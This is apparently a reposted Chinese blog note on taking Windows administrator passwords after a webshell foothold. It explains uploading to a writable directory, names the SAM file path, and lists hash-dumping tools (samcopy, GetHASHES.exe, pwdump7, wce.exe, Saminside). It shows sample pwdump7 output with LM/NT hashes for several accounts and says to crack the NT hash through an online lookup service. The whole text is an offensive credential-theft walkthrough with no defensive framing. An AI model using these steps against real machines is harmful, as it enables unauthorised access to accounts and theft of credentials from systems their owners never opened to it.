windows 抓hash获取管理员密码
Posted yuanzijian-ruiec
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了windows 抓hash获取管理员密码相关的知识,希望对你有一定的参考价值。
webshell 找能执行权限的目录上传
C:\\Windows\\System32\\config\\sam 内有windows 密码 利用工具把密码抓出来
samcopy 直接抓取
GetHASHES.exe $Local 返回当前系统所有的用户的哈希
pwdump7.exe 自动抓取哈希 都是用cmd 执行 来宾和system 一般都没有密码
wce.exe 自动抓哈希
Saminside 字典破解
破解sam密码
我一般用pwdump7 执行后返回
Administrator:500:7B59ACC609CD473AF50785CA52198E4D:92748A4523592194AF8963A1949FCA0B:::
Guest:501:64C3E77603C7A3BF5A5E17C210A88A96:30CFBECB0A6FD6BADBAB21A275788798:::
:503:4F07A12B796A954B583F6D0501D59953:A0D5FADC55DA895E937A93ED39669D76:::
:504:9D8835529B6E728C4CEE482ECCDDD9CE:0A51EEE494AB8F940DB69BC2FCA4E648:::
test:1001:F5942A1378FEC39E6ACBF03ADAEE3EB1:8DFE55D2D16AA9E2DA4F44412E897201:::
密码格式为
nt-hash 直接丢到cmd5里解密 可以得到密码
以上是关于windows 抓hash获取管理员密码的主要内容,如果未能解决你的问题,请参考以下文章